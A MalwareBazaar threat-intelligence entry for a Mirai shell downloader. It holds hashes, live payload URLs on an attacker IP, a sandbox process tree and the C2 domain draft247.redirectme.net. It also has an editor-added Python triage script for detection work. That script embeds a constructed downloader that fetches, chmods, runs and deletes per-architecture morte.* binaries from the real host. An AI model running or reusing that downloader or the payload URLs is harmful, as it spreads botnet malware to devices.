MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 7



SHA256 hash: fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e
SHA3-384 hash: f340a27ba5380d6f5d8480a87f4f57b7fcac5628d95ce9388bc0794955f5b2df7f403951ca42875d9cf98ccb2848c7e7
SHA1 hash: fac3e8b32ea7cc390ccfea16602b759e93967f6b
MD5 hash: e448f3693bfdb1b17f403fe7bc7c0407
humanhash: foxtrot-beer-thirteen-mirror
File name: 1.sh
Download: download sample
Signature: Mirai
File size: 3'314 bytes
First seen: 2025-10-14 11:26:18 UTC
Last seen: 2025-10-14 15:01:23 UTC
File type: sh
MIME type: text/x-shellscript
ssdeep: 24:ItRZsHbhJk/lfzmsnTNWGgJ16PnLbwNIpKksnMEXhlsbAcGgJstlpk:i0FKFbTNW14vLmJhx+bABgJsJk
TLSH: T1406180FA33424B336CAB89D3B2AA46457541449B98CF5F755FEC28A61C8CEC9EC41642
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
URL | Malware sample (SHA256 hash) | Signature | Tags
http://103.77.241.42/00101010101001/morte.x86 | f0454ecbe1c8e345f47bcdeec1ae1e5b4ab65d9e4fd4dff282f49d170f153aad | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.mips | 7c76263e2585d5392873abc6ca6e69729b49ef923b0f63303680cc416c712f1e | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arc | b86f640ff55d462086aa7168773e84bb23d3892bd0de5aaf8096e33e34cdce2e | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.i468 | n/a | n/a | elf ua-wget
http://103.77.241.42/00101010101001/morte.i686 | 7a4c1d6ea998a8b77a7d31c69ff34e7bb976028ddff09004e189b9c791136ee2 | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.x86_64 | c340fdfb6b6c6331f9a31859d47675b645ab377513e7825ab4e7b49e690bb4aa | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.mpsl | 3eb73b8e5607915fa8acd7a06f5f8a4e130c6f0391f914de667aaaefacc1c699 | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arm | 5f89e2c43a0688aba77d53a4c0389bab3c675d8449948be64b32fa939df5515d | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arm5 | 80a861774c1057f75676efbd54e286849df44c53566fb3db3cc6a82b9ebcb6bb | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arm6 | 871cc3d6b98dc6e5558a4c37a970f58c4c1e96838c4a06bebf4d4fc82ccd9e1a | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arm7 | 445ff1f50ec4aba47a5a77cf1e4053958f3cb6e5fcbe0b73ffa2aaeb11bec2ad | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.ppc | 51c9a33930a575d37d0777ba2e7b5f77082aff344f536168c4ac5e788f1f23fa | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.spc | 5c44011d12ffc588f127d287617ef6b76596be86832d094b3e058dcab5d9bf26 | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.m68k | 0584c5ff65ef5df948e8638ab54e394efff52cc40a54a084b69affaa845a9013 | Mirai | elf mirai ua-wget
http://103.77.241.42/00101010101001/morte.sh4 | 0e618351e2ba0a1c11b2e6aea9c2d913bee70ebb827b8064885f9563148f7f07 | Mirai | elf mirai ua-wget

Intelligence


File Origin
# of uploads: 2
# of downloads: 39
Origin country: DE
Vendor Threat Intelligence
Verdict: Malicious
File Type: unix shell
First seen: 2025-09-26T05:19:00Z UTC
Last seen: 2025-10-15T04:11:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph (process tree reconstructed from the sandbox graph data; flags in brackets, network peers after "->"):

/usr/bin/sudo (pid 2505)
  execve /tmp/sample.bin (pid 2513)
    execve /usr/bin/cp (pid 2515)
    execve /usr/bin/wget (pid 2526) [net, send-data, write-file] -> 103.77.241.42:80 (152 B sent)
    execve /usr/bin/curl (pid 3913) [net, send-data, write-file] -> 103.77.241.42:80 (101 B sent)
    execve /usr/bin/chmod (pid 5008)
    execve /tmp/morte.x86 (pid 5010) [net] -> 8.8.8.8:53 (connect)
      clone /tmp/morte.x86 (pid 5012)
        clone /tmp/morte.x86 (pid 5013)
        clone /tmp/morte.x86 (pid 5014) [dns, net, send-data, zombie] -> 8.8.8.8:53 (82 B sent); draft247.redirectme.net:12121 (32 B sent)
      clone /tmp/morte.x86 (pid 5231)
      clone /tmp/morte.x86 (pid 5232) [net, send-data, zombie] -> 8.8.8.8:53 (820 B sent); 103.77.241.144:80 (2 B sent)
    execve /usr/bin/rm (pid 5233) [delete-file]
    execve /usr/bin/wget (pid 5234) [net, send-data, write-file] -> draft247.redirectme.net:80 (153 B sent)
    execve /usr/bin/curl (pid 5257) [net, send-data, write-file] -> draft247.redirectme.net:80 (102 B sent)
    execve /usr/bin/chmod (pid 5275)
    clone /usr/bin/bash (pid 5276)
    execve /usr/bin/rm (pid 5278) [delete-file]
    execve /usr/bin/wget (pid 5279) [net, send-data, write-file] -> draft247.redirectme.net:80 (152 B sent)
    execve /usr/bin/curl (pid 5280) [net, send-data, write-file] -> draft247.redirectme.net:80 (101 B sent)

Network peers observed: 103.77.241.42:80 (payload download host, matching the URL table), 8.8.8.8:53 (DNS), draft247.redirectme.net:12121 (contacted by the dropped morte.x86; matches the C2 extraction below), draft247.redirectme.net:80 (second wave of wget/curl fetches), 103.77.241.144:80.
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2025-09-26 10:52:16 UTC
File Type: Text (Shell)
AV detection: 23 of 38 (60.53%)
Threat level: 3/5
Result
Malware family:
Score: 10/10
Tags: family:mirai antivm botnet defense_evasion discovery linux upx
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family
Malware Config
C2 Extraction: draft247.redirectme.net
Please note that we are no longer able to provide a coverage score for Virus Total.
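As an added worked example (this is editor-supplied code, not code from MalwareBazaar, abuse.ch, or the sample itself), the Python below statically triages a Mirai-style shell downloader of the kind described by the behaviour graph above: it expands a shell for-loop architecture list into concrete download URLs, checks them against the URL table on this page, extracts the hosts the script would contact, and flags the fetch / chmod / execute / rm pattern. The script text it runs on is constructed to mirror the reported behaviour (wget and curl to 103.77.241.42, chmod, run, delete, across the same architectures the table lists); the real 1.sh is not reproduced here and its exact contents are an assumption.

```python
import re

# IOC URLs exactly as listed in this entry's URL table (page data, not an assumption).
KNOWN_IOC_URLS = {
    f"http://103.77.241.42/00101010101001/morte.{arch}"
    for arch in ("x86", "mips", "arc", "i468", "i686", "x86_64", "mpsl", "arm",
                 "arm5", "arm6", "arm7", "ppc", "spc", "m68k", "sh4")
}

# CONSTRUCTED stand-in for the sample. It mirrors what the sandbox reported
# (wget/curl of per-architecture morte.* payloads, chmod, execute, rm) but is
# NOT the real 1.sh, whose contents the MalwareBazaar page does not show.
SAMPLE_SH = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
for a in x86 mips arc i468 i686 x86_64 mpsl arm arm5 arm6 arm7 ppc spc m68k sh4; do
  wget http://103.77.241.42/00101010101001/morte.$a -O morte.$a || curl -O http://103.77.241.42/00101010101001/morte.$a
  chmod +x morte.$a
  ./morte.$a
  rm -f morte.$a
done
"""

URL_RE = re.compile(r"https?://[^\s'\"<>|;&)]+")
FOR_LOOP_RE = re.compile(r"\bfor\s+(\w+)\s+in\s+([^;\n]+?)\s*;?\s*do\b")

# Heuristics for the downloader pattern; each is a regex evaluated in MULTILINE mode.
INDICATORS = {
    "fetch_tool":      r"\b(wget|curl|tftp|ftpget)\b",        # pulls a payload over the network
    "chmod_exec":      r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b",     # makes the dropped file executable
    "exec_dropped":    r"(^|\s)\./[\w.$-]+",                   # runs a file from the working dir
    "cleanup":         r"\brm\s+-[a-z]*f\b",                   # deletes the payload after launch
    "cd_writable_dir": r"\bcd\s+/(tmp|var/run|mnt|dev/shm)\b", # moves to a world-writable dir
    "arch_sweep":      r"\b(mips|mpsl|arm[5-7]?|x86_64|m68k|sh4|ppc|spc|arc)\b",  # multi-arch spray
}


def loop_vars(script):
    """Map each `for VAR in w1 w2 ...; do` loop variable to its literal word list."""
    return {m.group(1): m.group(2).split() for m in FOR_LOOP_RE.finditer(script)}


def extract_urls(script):
    """URLs in the script, with $VAR / ${VAR} expanded over any for-loop word lists."""
    expansions = loop_vars(script)
    urls = []
    for raw in URL_RE.findall(script):
        candidates = [raw]
        for name, words in expansions.items():
            n = re.escape(name)
            var = re.compile(r"\$(?:\{" + n + r"\}|" + n + r"(?!\w))")
            if var.search(raw):
                candidates = [var.sub(lambda _m, w=w: w, c) for c in candidates for w in words]
        urls.extend(candidates)
    return list(dict.fromkeys(urls))  # de-duplicate, keep first-seen order


def hosts_of(urls):
    """Distinct hosts (IP or name) the script would contact."""
    return sorted({re.match(r"https?://([^/:]+)", u).group(1) for u in urls})


def indicators(script):
    return {name: bool(re.search(rx, script, re.M)) for name, rx in INDICATORS.items()}


def triage(script):
    """Score a shell script and report URLs, hosts and overlap with the page's IOC table."""
    hits = indicators(script)
    urls = extract_urls(script)
    known = sorted(set(urls) & KNOWN_IOC_URLS)
    core = hits["fetch_tool"] and hits["chmod_exec"] and hits["exec_dropped"]
    return {
        "indicators": hits,
        "urls": urls,
        "hosts": hosts_of(urls),
        "known_iocs": known,
        "score": sum(hits.values()) + (2 if known else 0),  # range 0..8
        "verdict": "downloader" if core else "inconclusive",
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_SH), indent=2))
```

The loop expansion matters in practice: a naive URL grep on this kind of script yields a single `morte.$a` template and misses that it resolves to every payload in the table above, which is what you want to block or hunt for. The verdict deliberately requires fetch, chmod and execute together; a script that only downloads, or only changes permissions, stays "inconclusive" so that the score, not the label, carries the weaker signals.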

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic Approach to Shellscript downloaders

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
Mirai: sh fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e (this sample)

Delivery method: Distributed via web download

Comments